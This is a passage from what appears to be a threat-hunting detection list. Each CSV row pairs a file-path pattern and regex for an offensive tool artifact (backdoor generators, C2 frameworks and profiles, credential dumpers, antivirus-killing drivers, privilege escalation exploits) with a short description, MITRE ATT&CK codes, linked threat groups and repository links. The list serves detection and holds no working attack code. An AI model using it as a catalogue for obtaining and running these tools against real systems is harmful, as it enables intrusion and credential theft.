"*/backdoor_all_users.py*",".{0,1000}\/backdoor_all_users\.py.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","5529" "*/backdoor_apk*",".{0,1000}\/backdoor_apk.{0,1000}","offensive_tool_keyword","TheFatRat","Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and dll.","T1027 - T1059 - T1105 - T1218","TA0002 - TA0003","N/A","N/A","Exploitation tool","https://github.com/Screetsec/TheFatRat","1","0","#linux","N/A","N/A","10","9941","2324","2024-03-17T12:09:38Z","2016-07-24T10:30:19Z","5530" "*/backdoored-script.ps1*",".{0,1000}\/backdoored\-script\.ps1.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","1","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","5531" "*/BackgroundShell.exe*",".{0,1000}\/BackgroundShell\.exe.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","5532" "*/BackHAck.git*",".{0,1000}\/BackHAck\.git.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - 
T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","1","#linux","N/A","10","10","108","34","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z","5533" "*/backhack.py*",".{0,1000}\/backhack\.py.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","1","#linux","N/A","10","10","108","34","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z","5534" "*/backoff.profile*",".{0,1000}\/backoff\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - 
REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","5535" "*/backorifice-brute.nse*",".{0,1000}\/backorifice\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5536" "*/backorifice-info.nse*",".{0,1000}\/backorifice\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5537" "*/Backstab.git",".{0,1000}\/Backstab\.git","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1562.001 - T1569 - T1059","TA0005 - TA0040 - TA0002","N/A","Black Basta - LockBit","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","10","1435","244","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z","5538" "*/Backstab/Backstab*",".{0,1000}\/Backstab\/Backstab.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1562.001 - T1569 - T1059","TA0005 - TA0040 - TA0002","N/A","Black Basta - LockBit","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","10","1435","244","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z","5539" "*/backstab_src/*",".{0,1000}\/backstab_src\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 
- TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","5540" "*/Backstab64.exe*",".{0,1000}\/Backstab64\.exe.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1562.001 - T1569 - T1059","TA0005 - TA0040 - TA0002","N/A","Black Basta - LockBit","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","10","1435","244","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z","5541" "*/backupcreds.exe*",".{0,1000}\/backupcreds\.exe.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","Black Basta","Credential Access","https://github.com/leftp/BackupCreds","1","1","N/A","N/A","9","1","57","10","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z","5542" "*/BackupCreds.git*",".{0,1000}\/BackupCreds\.git.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","Black Basta","Credential 
Access","https://github.com/leftp/BackupCreds","1","1","N/A","N/A","9","1","57","10","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z","5543" "*/BackupOperatorToDA.git*",".{0,1000}\/BackupOperatorToDA\.git.{0,1000}","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","N/A","10","5","421","53","2025-01-04T14:16:46Z","2022-02-15T20:51:46Z","5544" "*/BackupPrivSam/*",".{0,1000}\/BackupPrivSam\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - 
Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/m57/cobaltstrike_bofs","1","1","N/A","N/A","10","10","164","25","2022-07-23T20:37:52Z","2020-07-30T22:36:51Z","5545" "*/bacnet-info.nse*",".{0,1000}\/bacnet\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5546" "*/bad-3-corrupt_lzma2.xz | tr *",".{0,1000}\/bad\-3\-corrupt_lzma2\.xz\s\|\str\s.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","#linux","rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","10","10","N/A","N/A","N/A","N/A","5547" "*/badcert.pem*",".{0,1000}\/badcert\.pem.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - 
TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","#linux","N/A","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","5548" "*/badkey.pem*",".{0,1000}\/badkey\.pem.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","#linux","N/A","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","5549" "*/BadPotato.dll*",".{0,1000}\/BadPotato\.dll.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","1","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","5550" "*/BadPotato.exe*",".{0,1000}\/BadPotato\.exe.{0,1000}","offensive_tool_keyword","BadPotato","Windows Privilege Escalation Exploit BadPotato","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","Earth Lusca","Privilege Escalation","https://github.com/BeichenDream/BadPotato","1","1","N/A","N/A","10","9","836","136","2020-05-10T15:42:21Z","2020-05-10T10:01:20Z","5551" "*/BadPotato.git*",".{0,1000}\/BadPotato\.git.{0,1000}","offensive_tool_keyword","BadPotato","Windows Privilege Escalation Exploit BadPotato","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","Earth Lusca","Privilege Escalation","https://github.com/BeichenDream/BadPotato","1","1","N/A","N/A","10","9","836","136","2020-05-10T15:42:21Z","2020-05-10T10:01:20Z","5552" "*/BadRat 
1.6/client.exe*",".{0,1000}\/BadRat\s1\.6\/client\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5553" "*/badrat.ps1*",".{0,1000}\/badrat\.ps1.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","N/A","10","1","N/A","N/A","N/A","N/A","5554" "*/badrat_cs.exe*",".{0,1000}\/badrat_cs\.exe.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","N/A","10","1","N/A","N/A","N/A","N/A","5555" "*/badrat_server.py*",".{0,1000}\/badrat_server\.py.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","N/A","10","1","N/A","N/A","N/A","N/A","5556" "*/badrats.git*",".{0,1000}\/badrats\.git.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - 
TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","N/A","10","1","N/A","N/A","N/A","N/A","5557" "*/BadRentdrv2.git*",".{0,1000}\/BadRentdrv2\.git.{0,1000}","offensive_tool_keyword","BadRentdrv2","A vulnerable driver (BYOVD) capable of terminating several EDRs and antivirus software","T1562 - T1068 - T1210 - T1489 - T1496","TA0005 - TA0004 - TA0040","N/A","Agrius","Defense Evasion","https://github.com/keowu/BadRentdrv2","1","1","N/A","N/A","10","1","95","20","2024-12-26T13:43:18Z","2023-10-01T18:24:38Z","5558" "*/BadWindowsService.exe*",".{0,1000}\/BadWindowsService\.exe.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","1","N/A","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","5559" "*/BadWindowsService.git*",".{0,1000}\/BadWindowsService\.git.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","1","N/A","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","5560" "*/BadZure.git*",".{0,1000}\/BadZure\.git.{0,1000}","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/mvelazc0/BadZure/","1","1","N/A","N/A","5","5","451","26","2025-04-10T03:20:03Z","2023-05-05T04:52:21Z","5561" 
"*/BadZure/*",".{0,1000}\/BadZure\/.{0,1000}","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/mvelazc0/BadZure/","1","1","N/A","N/A","5","5","451","26","2025-04-10T03:20:03Z","2023-05-05T04:52:21Z","5562" "*/banner.nse*",".{0,1000}\/banner\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5563" "*/Base64ToBin.py*",".{0,1000}\/Base64ToBin\.py.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","5564" "*/BaseNEncoder.cs*",".{0,1000}\/BaseNEncoder\.cs.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. 
Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","5565" "*/bash_completion.d/exegol*",".{0,1000}\/bash_completion\.d\/exegol.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","5566" "*/bash_executor/*.go",".{0,1000}\/bash_executor\/.{0,1000}\.go","offensive_tool_keyword","mythic","mythic C2 agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/freyja/","1","1","#linux","N/A","10","10","54","13","2024-10-29T17:32:07Z","2022-09-28T17:20:04Z","5567" "*/bashexplode/boko*",".{0,1000}\/bashexplode\/boko.{0,1000}","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/bashexplode/boko","1","1","#linux","N/A","N/A","1","71","13","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z","5568" 
"*/Bashfuscator*",".{0,1000}\/Bashfuscator.{0,1000}","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","1","#linux","N/A","10","10","1752","185","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z","5569" "*/bat_b4tm4n.php*",".{0,1000}\/bat_b4tm4n\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","5570" "*/batch_cme_smb.sh*",".{0,1000}\/batch_cme_smb\.sh.{0,1000}","offensive_tool_keyword","crackmapexec","crack mapexec script used by Dispossessor ransomware group","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - TA0009","N/A","Dispossessor - APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Lateral Movement","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","5571" "*/Bates.csproj*",".{0,1000}\/Bates\.csproj.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","5572" "*/batik_svg*",".{0,1000}\/batik_svg.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","5573" "*/Bat-Potato.bat*",".{0,1000}\/Bat\-Potato\.bat.{0,1000}","offensive_tool_keyword","Bat-Potato","Automating Juicy Potato Local Privilege Escalation CMD exploit for penetration testers","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/0x4xel/Bat-Potato","1","1","N/A","N/A","10","1","42","11","2022-12-13T20:19:51Z","2022-12-12T20:50:22Z","5574" "*/Bat-Potato.git*",".{0,1000}\/Bat\-Potato\.git.{0,1000}","offensive_tool_keyword","Bat-Potato","Automating Juicy Potato Local Privilege Escalation CMD exploit for penetration testers","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/0x4xel/Bat-Potato","1","1","N/A","N/A","10","1","42","11","2022-12-13T20:19:51Z","2022-12-12T20:50:22Z","5575" 
"*/bazarloader.profile*",".{0,1000}\/bazarloader\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","5576" "*/bbaranoff/CVE-2022-0847/*",".{0,1000}\/bbaranoff\/CVE\-2022\-0847\/.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation 
